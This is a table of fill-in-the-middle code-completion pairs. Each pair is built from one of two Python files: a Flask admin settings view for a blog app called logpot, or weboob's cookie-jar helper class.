prompt (large_string · lengths 72–9.34k) | completion (large_string · lengths 0–7.61k) |
---|---|
<|file_name|>setting.py<|end_file_name|><|fim▁begin|>#-*- coding: utf-8 -*-
from flask import current_app, flash, url_for, request
from flask_admin import expose, BaseView
from logpot.admin.base import AuthenticateView, flash_errors
from logpot.admin.forms import SettingForm
from logpot.utils import ImageUtil, getDirectoryPath, loadSiteConfig, saveSiteConfig
import os
from PIL import Image
class SettingView(AuthenticateView, BaseView):
def saveProfileImage(self, filestorage):
buffer = filestorage.stream
buffer.seek(0)
image = Image.open(buffer)
image = ImageUtil.crop_image(image, 64)
current_app.logger.info(image)
dirpath = getDirectoryPath(current_app, '_settings')
filepath = os.path.join(dirpath, "profile.png")
image.save(filepath, optimize=True)
@expose('/', methods=('GET','POST'))
def index(self):
form = SettingForm()
if form.validate_on_submit():
if form.profile_img.data:
file = form.profile_img.data
self.saveProfileImage(file)
data = {}
data['site_title'] = form.title.data
data['site_subtitle'] = form.subtitle.data
data['site_author'] = form.author.data
data['site_author_profile'] = form.author_profile.data
data['enable_link_github'] = form.enable_link_github.data
data['enable_profile_img'] = form.enable_profile_img.data
data["ogp_app_id"] = form.ogp_app_id.data
data["ga_tracking_id"] = form.ga_tracking_id.data
data["enable_twittercard"] = form.enable_twittercard.data
data["twitter_username"] = form.twitter_username.data
data['display_poweredby'] = form.display_poweredby.data
if saveSiteConfig(current_app, data):
flash('Successfully saved.')
else:
<|fim_middle|>
else:
flash_errors(form)
data = loadSiteConfig(current_app)
form.title.data = data['site_title']
form.subtitle.data = data['site_subtitle']
form.author.data = data['site_author']
form.author_profile.data = data['site_author_profile']
form.enable_link_github.data = data['enable_link_github']
form.enable_profile_img.data = data['enable_profile_img']
form.ogp_app_id.data = data["ogp_app_id"]
form.ga_tracking_id.data = data["ga_tracking_id"]
form.enable_twittercard.data = data["enable_twittercard"]
form.twitter_username.data = data["twitter_username"]
form.display_poweredby.data = data['display_poweredby']
return self.render('admin/setting.html', form=form)
<|fim▁end|> | flash('Oops. Save error.') |
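Each row below pairs a fill-in-the-middle (FIM) prompt with its held-out completion: the prompt wraps one source file in `<|file_name|>…<|end_file_name|>` and `<|fim▁begin|>…<|fim▁end|>` sentinels, and either a `<|fim_middle|>` or a `<|fim▁hole|>` marker stands where the completion was cut out. Below is a minimal sketch for splicing a pair back into the original file; the split-on-sentinel logic is an assumption about how the rows were produced, not something the dataset states.

```python
# Sketch only: splice a completion back into its FIM prompt.
# Assumptions: sentinels are spelled exactly as in the rows, and each
# prompt contains at most one hole marker.
FIM_BEGIN, FIM_END = "<|fim▁begin|>", "<|fim▁end|>"
HOLE_MARKERS = ("<|fim_middle|>", "<|fim▁hole|>")

def reassemble(prompt: str, completion: str) -> str:
    body = prompt.split(FIM_BEGIN, 1)[1].split(FIM_END, 1)[0]
    for marker in HOLE_MARKERS:
        if marker in body:
            prefix, suffix = body.split(marker, 1)
            return prefix + completion + suffix
    return body  # no hole marker: prompt already holds the whole file

# Toy pair shaped like the rows below:
print(reassemble(
    "<|file_name|>t.py<|end_file_name|><|fim▁begin|>def f():<|fim_middle|>\n<|fim▁end|>",
    " return 1",
))
```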
<|file_name|>setting.py<|end_file_name|><|fim▁begin|>#-*- coding: utf-8 -*-
from flask import current_app, flash, url_for, request
from flask_admin import expose, BaseView
from logpot.admin.base import AuthenticateView, flash_errors
from logpot.admin.forms import SettingForm
from logpot.utils import ImageUtil, getDirectoryPath, loadSiteConfig, saveSiteConfig
import os
from PIL import Image
class SettingView(AuthenticateView, BaseView):
def saveProfileImage(self, filestorage):
buffer = filestorage.stream
buffer.seek(0)
image = Image.open(buffer)
image = ImageUtil.crop_image(image, 64)
current_app.logger.info(image)
dirpath = getDirectoryPath(current_app, '_settings')
filepath = os.path.join(dirpath, "profile.png")
image.save(filepath, optimize=True)
@expose('/', methods=('GET','POST'))
def index(self):
form = SettingForm()
if form.validate_on_submit():
if form.profile_img.data:
file = form.profile_img.data
self.saveProfileImage(file)
data = {}
data['site_title'] = form.title.data
data['site_subtitle'] = form.subtitle.data
data['site_author'] = form.author.data
data['site_author_profile'] = form.author_profile.data
data['enable_link_github'] = form.enable_link_github.data
data['enable_profile_img'] = form.enable_profile_img.data
data["ogp_app_id"] = form.ogp_app_id.data
data["ga_tracking_id"] = form.ga_tracking_id.data
data["enable_twittercard"] = form.enable_twittercard.data
data["twitter_username"] = form.twitter_username.data
data['display_poweredby'] = form.display_poweredby.data
if saveSiteConfig(current_app, data):
flash('Successfully saved.')
else:
flash('Oops. Save error.')
else:
<|fim_middle|>
data = loadSiteConfig(current_app)
form.title.data = data['site_title']
form.subtitle.data = data['site_subtitle']
form.author.data = data['site_author']
form.author_profile.data = data['site_author_profile']
form.enable_link_github.data = data['enable_link_github']
form.enable_profile_img.data = data['enable_profile_img']
form.ogp_app_id.data = data["ogp_app_id"]
form.ga_tracking_id.data = data["ga_tracking_id"]
form.enable_twittercard.data = data["enable_twittercard"]
form.twitter_username.data = data["twitter_username"]
form.display_poweredby.data = data['display_poweredby']
return self.render('admin/setting.html', form=form)
<|fim▁end|> | flash_errors(form) |
<|file_name|>setting.py<|end_file_name|><|fim▁begin|>#-*- coding: utf-8 -*-
from flask import current_app, flash, url_for, request
from flask_admin import expose, BaseView
from logpot.admin.base import AuthenticateView, flash_errors
from logpot.admin.forms import SettingForm
from logpot.utils import ImageUtil, getDirectoryPath, loadSiteConfig, saveSiteConfig
import os
from PIL import Image
class SettingView(AuthenticateView, BaseView):
def <|fim_middle|>(self, filestorage):
buffer = filestorage.stream
buffer.seek(0)
image = Image.open(buffer)
image = ImageUtil.crop_image(image, 64)
current_app.logger.info(image)
dirpath = getDirectoryPath(current_app, '_settings')
filepath = os.path.join(dirpath, "profile.png")
image.save(filepath, optimize=True)
@expose('/', methods=('GET','POST'))
def index(self):
form = SettingForm()
if form.validate_on_submit():
if form.profile_img.data:
file = form.profile_img.data
self.saveProfileImage(file)
data = {}
data['site_title'] = form.title.data
data['site_subtitle'] = form.subtitle.data
data['site_author'] = form.author.data
data['site_author_profile'] = form.author_profile.data
data['enable_link_github'] = form.enable_link_github.data
data['enable_profile_img'] = form.enable_profile_img.data
data["ogp_app_id"] = form.ogp_app_id.data
data["ga_tracking_id"] = form.ga_tracking_id.data
data["enable_twittercard"] = form.enable_twittercard.data
data["twitter_username"] = form.twitter_username.data
data['display_poweredby'] = form.display_poweredby.data
if saveSiteConfig(current_app, data):
flash('Successfully saved.')
else:
flash('Oops. Save error.')
else:
flash_errors(form)
data = loadSiteConfig(current_app)
form.title.data = data['site_title']
form.subtitle.data = data['site_subtitle']
form.author.data = data['site_author']
form.author_profile.data = data['site_author_profile']
form.enable_link_github.data = data['enable_link_github']
form.enable_profile_img.data = data['enable_profile_img']
form.ogp_app_id.data = data["ogp_app_id"]
form.ga_tracking_id.data = data["ga_tracking_id"]
form.enable_twittercard.data = data["enable_twittercard"]
form.twitter_username.data = data["twitter_username"]
form.display_poweredby.data = data['display_poweredby']
return self.render('admin/setting.html', form=form)
<|fim▁end|> | saveProfileImage |
<|file_name|>setting.py<|end_file_name|><|fim▁begin|>#-*- coding: utf-8 -*-
from flask import current_app, flash, url_for, request
from flask_admin import expose, BaseView
from logpot.admin.base import AuthenticateView, flash_errors
from logpot.admin.forms import SettingForm
from logpot.utils import ImageUtil, getDirectoryPath, loadSiteConfig, saveSiteConfig
import os
from PIL import Image
class SettingView(AuthenticateView, BaseView):
def saveProfileImage(self, filestorage):
buffer = filestorage.stream
buffer.seek(0)
image = Image.open(buffer)
image = ImageUtil.crop_image(image, 64)
current_app.logger.info(image)
dirpath = getDirectoryPath(current_app, '_settings')
filepath = os.path.join(dirpath, "profile.png")
image.save(filepath, optimize=True)
@expose('/', methods=('GET','POST'))
def <|fim_middle|>(self):
form = SettingForm()
if form.validate_on_submit():
if form.profile_img.data:
file = form.profile_img.data
self.saveProfileImage(file)
data = {}
data['site_title'] = form.title.data
data['site_subtitle'] = form.subtitle.data
data['site_author'] = form.author.data
data['site_author_profile'] = form.author_profile.data
data['enable_link_github'] = form.enable_link_github.data
data['enable_profile_img'] = form.enable_profile_img.data
data["ogp_app_id"] = form.ogp_app_id.data
data["ga_tracking_id"] = form.ga_tracking_id.data
data["enable_twittercard"] = form.enable_twittercard.data
data["twitter_username"] = form.twitter_username.data
data['display_poweredby'] = form.display_poweredby.data
if saveSiteConfig(current_app, data):
flash('Successfully saved.')
else:
flash('Oops. Save error.')
else:
flash_errors(form)
data = loadSiteConfig(current_app)
form.title.data = data['site_title']
form.subtitle.data = data['site_subtitle']
form.author.data = data['site_author']
form.author_profile.data = data['site_author_profile']
form.enable_link_github.data = data['enable_link_github']
form.enable_profile_img.data = data['enable_profile_img']
form.ogp_app_id.data = data["ogp_app_id"]
form.ga_tracking_id.data = data["ga_tracking_id"]
form.enable_twittercard.data = data["enable_twittercard"]
form.twitter_username.data = data["twitter_username"]
form.display_poweredby.data = data['display_poweredby']
return self.render('admin/setting.html', form=form)
<|fim▁end|> | index |
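In the rows above, `flash_errors` (imported from `logpot.admin.base`) is otherwise always called with the form object when validation fails, which is why the string call in the save-failure branch reads better as a plain `flash`. The helper itself is not included in this dataset; a minimal sketch of the conventional Flask-WTF pattern it presumably follows:

```python
# Hypothetical sketch of logpot.admin.base.flash_errors -- the real
# implementation is not shown in these rows; this is only the conventional
# Flask-WTF error-flashing pattern.
from flask import flash

def flash_errors(form):
    for field, errors in form.errors.items():
        for error in errors:
            flash("Error in %s: %s" % (getattr(form, field).label.text, error))
```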
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.<|fim▁hole|>except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj<|fim▁end|> |
import requests.cookies
try:
import cookielib |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
<|fim_middle|>
<|fim▁end|> | @classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
<|fim_middle|>
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | """
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj) |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
<|fim_middle|>
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | """
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True) |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
<|fim_middle|>
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
<|fim_middle|>
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | """Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie |
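Note that `make_cookies` reads headers through the Python 2 `httplib` API (`headers.getheaders(...)`), so it only runs on the `cookielib` branch of the import fallback; under Python 3, `response.info()` returns an `email.message.Message`, where the accessor is spelled `get_all`. A compatibility shim one could drop in (an assumption, not part of weboob's shown code):

```python
# Compatibility sketch (assumption: Python 3 responses expose headers as an
# email.message.Message, whose getheaders() equivalent is get_all()).
def get_all_headers(headers, name):
    if hasattr(headers, "getheaders"):        # Python 2 httplib message
        return headers.getheaders(name)
    return headers.get_all(name) or []        # Python 3 email.message.Message
```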
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
<|fim_middle|>
<|fim▁end|> | new_cj = type(self)()
new_cj.update(self)
return new_cj |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
<|fim_middle|>
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | yield cookie |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
<|fim_middle|>
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
